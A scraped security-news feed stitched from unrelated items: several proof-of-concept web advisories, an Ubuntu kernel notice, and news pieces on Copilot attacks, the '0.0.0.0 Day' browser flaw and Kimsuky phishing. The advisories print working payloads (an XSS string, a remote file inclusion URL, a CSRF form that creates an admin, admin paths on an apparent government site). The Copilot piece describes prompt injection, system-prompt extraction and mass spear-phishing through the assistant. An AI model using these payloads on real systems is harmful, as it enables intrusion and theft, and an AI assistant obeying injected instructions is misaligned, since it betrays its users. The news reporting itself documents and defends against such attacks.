Gaati Track version 1.0-2023 suffers from an insecure direct object reference vulnerability.

    ====================================================================================================================================| # Title     : Gaati track v1.0-2023 IDOR Vulnerability                                                                           || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://www.mayurik.com/source-code/P0998/best-courier-management-system-project-in-php                            |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.[+] use payload : /new_user.php                 /branch_list.php         /parcel_list.php         /reports.php         /sidebar.php         /staff_list.php[+] https://www/127.0.0.1/ks50.karnataka.govin/sidebar.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Gaati Track 1.0-2023 Insecure Direct Object Reference

Ubuntu Security Notice 6949-1 - Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-6949-1August 08, 2024linux, linux-aws, linux-gcp, linux-gke, linux-ibm, linux-nvidia,linux-nvidia-6.8, linux-oem-6.8 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 24.04 LTS- Ubuntu 22.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-gke: Linux kernel for Google Container Engine (GKE) systems- linux-ibm: Linux kernel for IBM cloud systems- linux-nvidia: Linux kernel for NVIDIA systems- linux-oem-6.8: Linux kernel for OEM systems- linux-nvidia-6.8: Linux kernel for NVIDIA systemsDetails:Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:   - ARM32 architecture;   - ARM64 architecture;   - M68K architecture;   - OpenRISC architecture;   - PowerPC architecture;   - RISC-V architecture;   - x86 architecture;   - Block layer subsystem;   - Accessibility subsystem;   - Bluetooth drivers;   - Clock framework and drivers;   - CPU frequency scaling framework;   - Hardware crypto device drivers;   - DMA engine subsystem;   - DPLL subsystem;   - FireWire subsystem;   - EFI core;   - Qualcomm firmware drivers;   - GPIO subsystem;   - GPU drivers;   - Microsoft Hyper-V drivers;   - InfiniBand drivers;   - IOMMU subsystem;   - IRQ chip drivers;   - Macintosh device drivers;   - Multiple devices driver;   - Media drivers;   - EEPROM drivers;   - MMC subsystem;   - Network drivers;   - STMicroelectronics network drivers;   - Device tree and open firmware driver;   - HiSilicon SoC PMU drivers;   - PHY drivers;   - Pin controllers subsystem;   - Remote Processor subsystem;   - S/390 drivers;   - SCSI drivers;   - SPI subsystem;   - Media staging drivers;   - Thermal drivers;   - Userspace I/O drivers;   - USB subsystem;   - DesignWare USB3 driver;   - ACRN Hypervisor Service Module driver;   - Virtio drivers;   - 9P distributed file system;   - BTRFS file system;   - eCrypt file system;   - EROFS file system;   - File systems infrastructure;   - GFS2 file system;   - JFFS2 file system;   - Network file systems library;   - Network file system client;   - Network file system server daemon;   - NILFS2 file system;   - Proc file system;   - SMB network file system;   - Tracing file system;   - Mellanox drivers;   - Memory management;   - Socket messages infrastructure;   - Slab allocator;   - Tracing infrastructure;   - User-space API (UAPI);   - Core kernel;   - BPF subsystem;   - DMA mapping infrastructure;   - RCU subsystem;   - Dynamic debug library;   - KUnit library;   - Maple Tree data structure library;   - Heterogeneous memory management;   - Amateur Radio drivers;   - Bluetooth subsystem;   - Ethernet bridge;   - Networking core;   - IPv4 networking;   - IPv6 networking;   - Multipath TCP;   - Netfilter;   - NET/ROM layer;   - NFC subsystem;   - NSH protocol;   - Open vSwitch;   - Phonet protocol;   - SMC sockets;   - TIPC protocol;   - Unix domain sockets;   - Wireless networking;   - Key management;   - ALSA framework;   - HD-audio driver;   - Kirkwood ASoC drivers;   - MediaTek ASoC drivers;(CVE-2024-36006, CVE-2024-36922, CVE-2024-38567, CVE-2024-38584,CVE-2024-36923, CVE-2024-36892, CVE-2024-35855, CVE-2024-35853,CVE-2024-38562, CVE-2024-36920, CVE-2024-38543, CVE-2024-38576,CVE-2024-38572, CVE-2024-36898, CVE-2024-38560, CVE-2024-36004,CVE-2024-36956, CVE-2024-36881, CVE-2024-36977, CVE-2024-36955,CVE-2024-36906, CVE-2024-36013, CVE-2024-36884, CVE-2024-38563,CVE-2024-36966, CVE-2024-38547, CVE-2024-38594, CVE-2024-36926,CVE-2024-38587, CVE-2024-38566, CVE-2024-27400, CVE-2024-36941,CVE-2024-36017, CVE-2024-38544, CVE-2024-36899, CVE-2024-35851,CVE-2024-38577, CVE-2024-38590, CVE-2024-38568, CVE-2024-38559,CVE-2024-38611, CVE-2024-36887, CVE-2024-36886, CVE-2024-35996,CVE-2024-38612, CVE-2024-36925, CVE-2024-38586, CVE-2024-38596,CVE-2024-36932, CVE-2024-39482, CVE-2024-38585, CVE-2024-36033,CVE-2024-38614, CVE-2024-35852, CVE-2024-36908, CVE-2024-36939,CVE-2024-36963, CVE-2024-27401, CVE-2024-36029, CVE-2024-38540,CVE-2024-38565, CVE-2024-36927, CVE-2024-36910, CVE-2024-42134,CVE-2024-36888, CVE-2024-35859, CVE-2024-36911, CVE-2024-35947,CVE-2024-36940, CVE-2024-36921, CVE-2024-36913, CVE-2024-36943,CVE-2024-35986, CVE-2024-38616, CVE-2024-36900, CVE-2024-36954,CVE-2024-36915, CVE-2024-38602, CVE-2024-41011, CVE-2024-35991,CVE-2024-36909, CVE-2024-38603, CVE-2023-52882, CVE-2024-36953,CVE-2024-38599, CVE-2024-38574, CVE-2024-36967, CVE-2024-36895,CVE-2024-36003, CVE-2024-36961, CVE-2024-38545, CVE-2024-38538,CVE-2024-36001, CVE-2024-36912, CVE-2024-36952, CVE-2024-38550,CVE-2024-38570, CVE-2024-36969, CVE-2024-38595, CVE-2024-35849,CVE-2024-36936, CVE-2024-35949, CVE-2024-36009, CVE-2024-35987,CVE-2024-38541, CVE-2024-38564, CVE-2024-36032, CVE-2024-38615,CVE-2024-36960, CVE-2024-36934, CVE-2024-36951, CVE-2024-35999,CVE-2024-38551, CVE-2024-36903, CVE-2024-36931, CVE-2024-38593,CVE-2024-36938, CVE-2024-38607, CVE-2024-36928, CVE-2024-38552,CVE-2024-36002, CVE-2024-38605, CVE-2024-38582, CVE-2024-36933,CVE-2024-38620, CVE-2024-27395, CVE-2024-27396, CVE-2024-36012,CVE-2024-38591, CVE-2024-38597, CVE-2024-36889, CVE-2024-36964,CVE-2024-38606, CVE-2024-38553, CVE-2024-36945, CVE-2024-35848,CVE-2024-36962, CVE-2024-36947, CVE-2024-27399, CVE-2024-38546,CVE-2024-38583, CVE-2024-38573, CVE-2024-35850, CVE-2024-38549,CVE-2024-38588, CVE-2024-38610, CVE-2024-36917, CVE-2024-36957,CVE-2024-35846, CVE-2024-38579, CVE-2024-36965, CVE-2024-35857,CVE-2024-38548, CVE-2024-36975, CVE-2024-36919, CVE-2024-38542,CVE-2024-36948, CVE-2024-36011, CVE-2024-38556, CVE-2024-36897,CVE-2024-38557, CVE-2024-36890, CVE-2024-36882, CVE-2024-38613,CVE-2024-36914, CVE-2024-35998, CVE-2024-36958, CVE-2024-38580,CVE-2024-36896, CVE-2024-36891, CVE-2024-36924, CVE-2024-38589,CVE-2024-38592, CVE-2024-36904, CVE-2024-36894, CVE-2024-36028,CVE-2024-36014, CVE-2024-36880, CVE-2024-36944, CVE-2024-38598,CVE-2024-36929, CVE-2024-36883, CVE-2024-35858, CVE-2024-38555,CVE-2024-36005, CVE-2024-38539, CVE-2024-35994, CVE-2024-36030,CVE-2024-27394, CVE-2024-36930, CVE-2024-36937, CVE-2024-38561,CVE-2024-38578, CVE-2024-36959, CVE-2024-36935, CVE-2024-36916,CVE-2024-36902, CVE-2024-38604, CVE-2024-38554, CVE-2024-38575,CVE-2024-36918, CVE-2024-36979, CVE-2024-35854, CVE-2024-36968,CVE-2024-38558, CVE-2024-36000, CVE-2024-27398, CVE-2024-35983,CVE-2024-36949, CVE-2024-38600, CVE-2024-36950, CVE-2024-36946,CVE-2024-36031, CVE-2024-35847, CVE-2024-36905, CVE-2024-38571,CVE-2024-36007, CVE-2024-35856, CVE-2024-38601, CVE-2024-38569,CVE-2024-38617, CVE-2024-35988, CVE-2024-35989, CVE-2024-35993,CVE-2024-36893, CVE-2024-36901)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 24.04 LTS   linux-image-6.8.0-1008-gke      6.8.0-1008.11   linux-image-6.8.0-1010-ibm      6.8.0-1010.10   linux-image-6.8.0-1010-oem      6.8.0-1010.10   linux-image-6.8.0-1011-nvidia   6.8.0-1011.11   linux-image-6.8.0-1011-nvidia-64k  6.8.0-1011.11   linux-image-6.8.0-1012-gcp      6.8.0-1012.13   linux-image-6.8.0-1013-aws      6.8.0-1013.14   linux-image-6.8.0-40-generic    6.8.0-40.40   linux-image-6.8.0-40-generic-64k  6.8.0-40.40   linux-image-aws                 6.8.0-1013.14   linux-image-gcp                 6.8.0-1012.13   linux-image-generic             6.8.0-40.40   linux-image-generic-64k         6.8.0-40.40   linux-image-generic-64k-hwe-24.04  6.8.0-40.40   linux-image-generic-hwe-24.04   6.8.0-40.40   linux-image-generic-lpae        6.8.0-40.40   linux-image-gke                 6.8.0-1008.11   linux-image-ibm                 6.8.0-1010.10   linux-image-ibm-classic         6.8.0-1010.10   linux-image-ibm-lts-24.04       6.8.0-1010.10   linux-image-kvm                 6.8.0-40.40   linux-image-nvidia              6.8.0-1011.11   linux-image-nvidia-64k          6.8.0-1011.11   linux-image-oem-24.04           6.8.0-1010.10   linux-image-oem-24.04a          6.8.0-1010.10   linux-image-virtual             6.8.0-40.40   linux-image-virtual-hwe-24.04   6.8.0-40.40Ubuntu 22.04 LTS   linux-image-6.8.0-1011-nvidia   6.8.0-1011.11~22.04.1   linux-image-6.8.0-1011-nvidia-64k  6.8.0-1011.11~22.04.1   linux-image-nvidia-6.8          6.8.0-1011.11~22.04.1   linux-image-nvidia-64k-6.8      6.8.0-1011.11~22.04.1After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6949-1   CVE-2023-52882, CVE-2024-27394, CVE-2024-27395, CVE-2024-27396,   CVE-2024-27398, CVE-2024-27399, CVE-2024-27400, CVE-2024-27401,   CVE-2024-35846, CVE-2024-35847, CVE-2024-35848, CVE-2024-35849,   CVE-2024-35850, CVE-2024-35851, CVE-2024-35852, CVE-2024-35853,   CVE-2024-35854, CVE-2024-35855, CVE-2024-35856, CVE-2024-35857,   CVE-2024-35858, CVE-2024-35859, CVE-2024-35947, CVE-2024-35949,   CVE-2024-35983, CVE-2024-35986, CVE-2024-35987, CVE-2024-35988,   CVE-2024-35989, CVE-2024-35991, CVE-2024-35993, CVE-2024-35994,   CVE-2024-35996, CVE-2024-35998, CVE-2024-35999, CVE-2024-36000,   CVE-2024-36001, CVE-2024-36002, CVE-2024-36003, CVE-2024-36004,   CVE-2024-36005, CVE-2024-36006, CVE-2024-36007, CVE-2024-36009,   CVE-2024-36011, CVE-2024-36012, CVE-2024-36013, CVE-2024-36014,   CVE-2024-36017, CVE-2024-36028, CVE-2024-36029, CVE-2024-36030,   CVE-2024-36031, CVE-2024-36032, CVE-2024-36033, CVE-2024-36880,   CVE-2024-36881, CVE-2024-36882, CVE-2024-36883, CVE-2024-36884,   CVE-2024-36886, CVE-2024-36887, CVE-2024-36888, CVE-2024-36889,   CVE-2024-36890, CVE-2024-36891, CVE-2024-36892, CVE-2024-36893,   CVE-2024-36894, CVE-2024-36895, CVE-2024-36896, CVE-2024-36897,   CVE-2024-36898, CVE-2024-36899, CVE-2024-36900, CVE-2024-36901,   CVE-2024-36902, CVE-2024-36903, CVE-2024-36904, CVE-2024-36905,   CVE-2024-36906, CVE-2024-36908, CVE-2024-36909, CVE-2024-36910,   CVE-2024-36911, CVE-2024-36912, CVE-2024-36913, CVE-2024-36914,   CVE-2024-36915, CVE-2024-36916, CVE-2024-36917, CVE-2024-36918,   CVE-2024-36919, CVE-2024-36920, CVE-2024-36921, CVE-2024-36922,   CVE-2024-36923, CVE-2024-36924, CVE-2024-36925, CVE-2024-36926,   CVE-2024-36927, CVE-2024-36928, CVE-2024-36929, CVE-2024-36930,   CVE-2024-36931, CVE-2024-36932, CVE-2024-36933, CVE-2024-36934,   CVE-2024-36935, CVE-2024-36936, CVE-2024-36937, CVE-2024-36938,   CVE-2024-36939, CVE-2024-36940, CVE-2024-36941, CVE-2024-36943,   CVE-2024-36944, CVE-2024-36945, CVE-2024-36946, CVE-2024-36947,   CVE-2024-36948, CVE-2024-36949, CVE-2024-36950, CVE-2024-36951,   CVE-2024-36952, CVE-2024-36953, CVE-2024-36954, CVE-2024-36955,   CVE-2024-36956, CVE-2024-36957, CVE-2024-36958, CVE-2024-36959,   CVE-2024-36960, CVE-2024-36961, CVE-2024-36962, CVE-2024-36963,   CVE-2024-36964, CVE-2024-36965, CVE-2024-36966, CVE-2024-36967,   CVE-2024-36968, CVE-2024-36969, CVE-2024-36975, CVE-2024-36977,   CVE-2024-36979, CVE-2024-38538, CVE-2024-38539, CVE-2024-38540,   CVE-2024-38541, CVE-2024-38542, CVE-2024-38543, CVE-2024-38544,   CVE-2024-38545, CVE-2024-38546, CVE-2024-38547, CVE-2024-38548,   CVE-2024-38549, CVE-2024-38550, CVE-2024-38551, CVE-2024-38552,   CVE-2024-38553, CVE-2024-38554, CVE-2024-38555, CVE-2024-38556,   CVE-2024-38557, CVE-2024-38558, CVE-2024-38559, CVE-2024-38560,   CVE-2024-38561, CVE-2024-38562, CVE-2024-38563, CVE-2024-38564,   CVE-2024-38565, CVE-2024-38566, CVE-2024-38567, CVE-2024-38568,   CVE-2024-38569, CVE-2024-38570, CVE-2024-38571, CVE-2024-38572,   CVE-2024-38573, CVE-2024-38574, CVE-2024-38575, CVE-2024-38576,   CVE-2024-38577, CVE-2024-38578, CVE-2024-38579, CVE-2024-38580,   CVE-2024-38582, CVE-2024-38583, CVE-2024-38584, CVE-2024-38585,   CVE-2024-38586, CVE-2024-38587, CVE-2024-38588, CVE-2024-38589,   CVE-2024-38590, CVE-2024-38591, CVE-2024-38592, CVE-2024-38593,   CVE-2024-38594, CVE-2024-38595, CVE-2024-38596, CVE-2024-38597,   CVE-2024-38598, CVE-2024-38599, CVE-2024-38600, CVE-2024-38601,   CVE-2024-38602, CVE-2024-38603, CVE-2024-38604, CVE-2024-38605,   CVE-2024-38606, CVE-2024-38607, CVE-2024-38610, CVE-2024-38611,   CVE-2024-38612, CVE-2024-38613, CVE-2024-38614, CVE-2024-38615,   CVE-2024-38616, CVE-2024-38617, CVE-2024-38620, CVE-2024-39482,   CVE-2024-41011, CVE-2024-42134Package Information:   https://launchpad.net/ubuntu/+source/linux/6.8.0-40.40   https://launchpad.net/ubuntu/+source/linux-aws/6.8.0-1013.14   https://launchpad.net/ubuntu/+source/linux-gcp/6.8.0-1012.13   https://launchpad.net/ubuntu/+source/linux-gke/6.8.0-1008.11   https://launchpad.net/ubuntu/+source/linux-ibm/6.8.0-1010.10   https://launchpad.net/ubuntu/+source/linux-nvidia/6.8.0-1011.11   https://launchpad.net/ubuntu/+source/linux-oem-6.8/6.8.0-1010.10   https://launchpad.net/ubuntu/+source/linux-nvidia-6.8/6.8.0-1011.11~22.04.1

Ubuntu Security Notice USN-6949-1

Farmacia Gama version 1.0 suffers from a file inclusion vulnerability.

    =============================================================================================================================================| # Title     : Farmacia Gama v1.0 File inclusion Vulnerability                                                                             || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://download-media.code-projects.org/2020/04/Farmacia_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip                |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /main.php?id=1&pg=[+] http://127.0.0.1/farmacia-master/main.php?id=1&pg=http://127.0.0.1/phpMyAdmin/themes/pmahomme/img/logo_left.pngGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Farmacia Gama 1.0 File Inclusion 

Employee Management System version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Employee Management System v1.0 CSRF Vulnerability                                                                          |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/php/16999/employee-management-system.html                                                    |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code create a new admin .

[+] Go to the line 9.

[+] Set the target site link Save changes and apply . 

[+] infected file : employee_akpoly/Admin/add-admin.php.

[+] http://127.0.0.1/employee_akpoly/Admin/add-admin.php.

[+] save code as poc.html .

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>Add Admin</title>  
</head>  
<body>  
    <form action="http://127.0.0.1/employee_akpoly/Admin/add-admin.php" method="POST" enctype="multipart/form-data">  
        <label for="txtusername">Username:</label>  
        <input type="text" id="txtusername" name="txtusername" required><br><br>

        <label for="txtfullname">Full Name:</label>  
        <input type="text" id="txtfullname" name="txtfullname" required><br><br>

        <label for="txtpassword">Password:</label>  
        <input type="password" id="txtpassword" name="txtpassword" required><br><br>

        <label for="txtphone">Phone Number:</label>  
        <input type="text" id="txtphone" name="txtphone" required><br><br>

        <label for="avatar">Avatar:</label>  
        <input type="file" id="avatar" name="avatar" accept="image/*"><br><br>

        <button type="submit" name="btncreate">Create</button>  
    </form>  
</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Employee Management System 1.0 Cross Site Request Forgery

E-Commerce Site using PHP PDO version 1.0 suffers from a cross site scripting vulnerability.

    =============================================================================================================================================| # Title     : E-Commerce Site using PHP PDO v1.0 XSS Vulnerability                                                                        || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/12287/e-commerce-site-using-php-pdo.html                                                 |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /index.php?product=r-series'%22()%26%25<acx><ScRiPt%20>prompt(936967)</ScRiPt>[+] https://www/127.0.0.1/demo/ips-lb.net/index.php?product=r-series'%22()%26%25<acx><ScRiPt%20>prompt(936967)</ScRiPt>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

E-Commerce Site Using PHP PDO 1.0 Cross Site Scripting

Attacks on Microsoft’s Copilot AI allow for answers to be manipulated, data extracted, and security protections bypassed, new research shows.

Microsoft raced to put generative AI at the heart of its systems. Ask a question about an upcoming meeting and the company’s Copilot AI system can pull answers from your emails, Teams chats, and files—a potential productivity boon. But these exact processes can also be abused by hackers.

Today at the Black Hat security conference in Las Vegas, researcher Michael Bargury is demonstrating five proof-of-concept ways that Copilot, which runs on its Microsoft 365 apps, such as Word, can be manipulated by malicious attackers, including using it to provide false references to files, exfiltrate some private data, and dodge Microsoft’s security protections.

One of the most alarming displays, arguably, is Bargury’s ability to turn the AI into an automatic spear-phishing machine. Dubbed LOLCopilot, the red-teaming code Bargury created can—crucially, once a hacker has access to someone’s work email—use Copilot to see who you email regularly, draft a message mimicking your writing style (including emoji use), and send a personalized blast that can include a malicious link or attached malware.

“I can do this with everyone you have ever spoken to, and I can send hundreds of emails on your behalf,” says Bargury, the cofounder and CTO of security company Zenity, who published his findings alongside videos showing how Copilot could be abused. “A hacker would spend days crafting the right email to get you to click on it, but they can generate hundreds of these emails in a few minutes.”

That demonstration, as with other attacks created by Bargury, broadly works by using the large language model (LLM) as designed: typing written questions to access data the AI can retrieve. However, it can produce malicious results by including additional data or instructions to perform certain actions. The research highlights some of the challenges of connecting AI systems to corporate data and what can happen when “untrusted” outside data is thrown into the mix—particularly when the AI answers with what could look like legitimate results.

Among the other attacks created by Bargury is a demonstration of how a hacker—who, again, must already have hijacked an email account—can gain access to sensitive information, such as people’s salaries, without triggering Microsoft’s protections for sensitive files. When asking for the data, Bargury’s prompt demands the system does not provide references to the files data is taken from. “A bit of bullying does help,” Bargury says.

In other instances, he shows how an attacker—who doesn’t have access to email accounts but poisons the AI’s database by sending it a malicious email—can manipulate answers about banking information to provide their own bank details. “Every time you give AI access to data, that is a way for an attacker to get in,” Bargury says.

Another demo shows how an external hacker could get some limited information about whether an upcoming company earnings call will be good or bad, while the final instance, Bargury says, turns Copilot into a “malicious insider” by providing users with links to phishing websites.

Phillip Misner, head of AI incident detection and response at Microsoft, says the company appreciates Bargury identifying the vulnerability and says it has been working with him to assess the findings. “The risks of post-compromise abuse of AI are similar to other post-compromise techniques,” Misner says. “Security prevention and monitoring across environments and identities help mitigate or stop such behaviors.”

As generative AI systems, such as OpenAI’s ChatGPT, Microsoft’s Copilot, and Google’s Gemini, have developed in the past two years, they’ve moved onto a trajectory where they may eventually be completing tasks for people, like booking meetings or online shopping. However, security researchers have consistently highlighted that allowing external data into AI systems, such as through emails or accessing content from websites, creates security risks through indirect prompt injection and poisoning attacks.

“I think it’s not that well understood how much more effective an attacker can actually become now,” says Johann Rehberger, a security researcher and red team director, who has extensively demonstrated security weaknesses in AI systems. “What we have to be worried \[about\] now is actually what is the LLM producing and sending out to the user.”

Bargury says Microsoft has put a lot of effort into protecting its Copilot system from prompt injection attacks, but he says he found ways to exploit it by unraveling how the system is built. This included extracting the internal system prompt, he says, and working out how it can access enterprise resources and the techniques it uses to do so. “You talk to Copilot and it’s a limited conversation, because Microsoft has put a lot of controls,” he says. “But once you use a few magic words, it opens up and you can do whatever you want.”

Rehberger broadly warns that some data issues are linked to the long-standing problem of companies allowing too many employees access to files and not properly setting access permissions across their organizations. “Now imagine you put Copilot on top of that problem,” Rehberger says. He says he has used AI systems to search for common passwords, such as Password123, and it has returned results from within companies.

Both Rehberger and Bargury say there needs to be more focus on monitoring what an AI produces and sends out to a user. “The risk is about how AI interacts with your environment, how it interacts with your data, how it performs operations on your behalf,” Bargury says. “You need to figure out what the AI agent does on a user's behalf. And does that make sense with what the user actually asked for.”

Microsoft’s AI Can Be Turned Into an Automated Phishing Machine

Attackers can use a seemingly innocuous IP address to exploit localhost APIs to conduct a range of malicious activity, including unauthorized access to user data and the delivery of malware.

Source: Tada Images via Shutterstock

Attackers can use a flaw that exploits the 0.0.0.0 IP address to remotely execute code on various Web browsers — Chrome, Safari, Firefox, and others — putting users at risk for data theft, malware, and other malicious activity.

Researchers at open source security firm Oligo Security have discovered a way to bypass browser security and interact with services running on an organization's local network from outside the network, that they are calling "0.0.0.0 Day," because of the Web address it exploits.

The vulnerability exists due to "the inconsistent implementation of security mechanisms across different browsers, along with a lack of standardization in the browser industry," Avi Lumesky, an Oligo AI security researcher, revealed in a blog post published this week.

Attackers can use the flaw to exploit localhost application programming interfaces (APIs) from the browser, thus performing a range of malicious activities.

"As a result, the seemingly innocuous IP address, 0.0.0.0, can become a powerful tool for attackers to exploit local services, including those used for development, operating systems, and even internal networks," Lumesky wrote.

**Breaking Down the Flaw**

The flaw lies in the ability by design of browsers for services to send a request to almost any HTTP server using JavaScript; a browser's key job is to focus on delivering the correct response, either by serving up a valid response to a request or an error.

While browsers are generally supposed to prevent errant or malicious requests from getting through via their responses, there has been a lack of streamlined security in handling requests across browsers since their inception.

"For a long time, it was not clear how browsers should behave when they make requests to local or internal networks from less-private contexts," Lumesky explained in the post.

While most browsers have relied on CORS, or Cross-Origin Resource Sharing — a standard defining a way for client Web applications that are loaded in one domain to interact with resources in a different domain — "its performance depends on the response content, so requests are still made and can still be sent," Lumesky noted.

"This is simply not good enough," he wrote. "History proved that a single HTTP request can attack a home router — and if that's all it takes, every user needs to be able to prevent this request from happening at all."

**PNA Bypass**

Chrome's introduction of Private Network Access (PNA) — which goes beyond CORS — should, in theory, protect websites from the 0.0.0.0 day bug. PNA proposes distinguishing between public, private, and local networks, ensuring that "pages loaded under a less-secure context will not be able to communicate with more-secure contexts," Lumesky wrote.

However, Oligo researchers discovered that website requests sent to 0.0.0.0, which should be blocked under PNA, were actually received and processed by local servers. "This means public websites can access any open port on your host without the ability to see the response," Lumesky wrote.

To prove their point, the attackers investigated how ShadowRay, a recent attack campaign its researchers discovered targeting AI workloads, could execute its attack from the browser using 0.0.0.0 as its attack vector.

ShadowRay enabled arbitrary code execution when a private server was unintentionally exposed to the Internet, and went undiscovered for nearly a year. To prove their concept, Oligo researchers ran a local Ray cluster on localhost, then started a socket that is listening to new connections to open a reverse shell.

"Then, the victim clicks on the link in the email, which runs the exploit," Lumesky explained. "The exploit opens a reverse shell for the attacker on the visitor’s machine."

The researchers proved the concept within Chromium, Safari, and Firefox to execute ShadowRay from the browser in "one of an undoubtedly huge number of remote code execution attacks enabled by this approach," Lumesky noted. They also proved the attack via Selenium Grid public servers and PyTorch TorchServe via respective previously identified attack campaigns SeleniumGreed and ShellTorch.

Ultimately, the researchers demonstrated how by using 0.0.0.0 together with mode "no-cors," attackers "can use public domains to attack services running on localhost and even gain arbitrary code execution, all using a single HTTP request," Lumeksy explained.

**How Defenders Can Mitigate Attacks**

Oligo disclosed the findings to the relevant browser owners — including Google, Apple, and Mozilla — which responded by making fixes in their browsers to block 0.0.0.0 as a target IP, according to Oligo.

Meanwhile, as the companies in charge work to streamline security standards across browser offerings, there are other technical mitigations that network administrators can use to thwart attacks using the vector, Lumesky said.

They include implementing PNA headers, verifying the HOST header of the network request to protect against DNS rebinding attacks to localhost or 127.0.0.1, and generally mistrusting localhost networks just because they are "local." "Add a minimal layer of authorization, even when running on localhost," he advised.

Network administrators should also use HTTPS over HTTP whenever possible and implement CSRF tokens in your applications, even if they are local.

**About the Author**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

'0.0.0.0 Day' Flaw Puts Chrome, Firefox, Mozilla Browsers at RCE Risk

A guest inside a VirtualBox VM using the virtio-net network adapter can trigger an intra-object out-of-bounds write in src/VBox/Devices/Network/DevVirtioNet.cpp to cause a denial-of-service or escape the hypervisor and compromise the host. This is Google's proof of concept exploit.

Oracle VM VirtualBox 7.0.10 r158379 Escape

The North Korea-linked threat actor known as Kimsuky has been linked to a new set of attacks targeting university staff, researchers, and professors for intelligence gathering purposes.
Cybersecurity firm Resilience said it identified the activity in late July 2024 after it observed an operation security (OPSEC) error made by the hackers.
Kimsuky, also known by the names APT43, ARCHIPELAGO,

Cyber Attack / Cyber Espionage

The North Korea-linked threat actor known as Kimsuky has been linked to a new set of attacks targeting university staff, researchers, and professors for intelligence gathering purposes.

Cybersecurity firm Resilience said it identified the activity in late July 2024 after it observed an operation security (OPSEC) error made by the hackers.

Kimsuky, also known by the names APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet, Springtail, and Velvet Chollima, is just one of the myriad offensive cyber teams operating under the direction of the North Korean government and military.

It's also very active, often leveraging spear-phishing campaigns as a starting point to deliver an ever-expanding set of custom tools to conduct reconnaissance, pilfer data, and establish persistent remote access to infected hosts.

The attacks are also characterized by the use of compromised hosts as staging infrastructure to deploy an obfuscated version of the Green Dinosaur web shell, which is then used to perform file operations. Kimuksy's use of the web shell was previously highlighted by security researcher blackorbird in May 2024.

The access afforded by Green Dinosaur is then abused to upload pre-built phishing pages that are designed to mimic legitimate login portals for Naver and various universities like Dongduk University, Korea University, and Yonsei University with the goal of capturing their credentials.

Next, the victims are redirected to another site that points to a PDF document hosted on Google Drive that purports to be an invitation to the Asan Institute for Policy Studies August Forum.

"Additionally on Kimsuky's phishing sites, there is a non-target specific phishing toolkit to gather Naver accounts," Resilience researchers said.

"This toolkit is a rudimentary proxy akin to Evilginx for stealing cookies and credentials from visitors and shows pop-ups telling users they need to login again because communication with the server was disrupted."

The analysis has also shed light on a custom PHPMailer tool used by Kimsuky called SendMail, which is employed to send phishing emails to the targets using Gmail and Daum Mail accounts.

To combat the threat, it's recommended that users enable phishing-resistant multi-factor authentication (MFA) and scrutinize the URLs before logging in.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

University Professors Targeted by North Korean Cyber Espionage Group

AMD Errata 1386 1 is a flaw that affects the AMD Zen 2 family of processors. The observed result of this bug is that changes to xmm or ymm extended registers during normal program execution may be unexpectedly discarded. The implications of this flaw will vary depending on the workload. This is Google's proof of concept exploit.

Tag

#google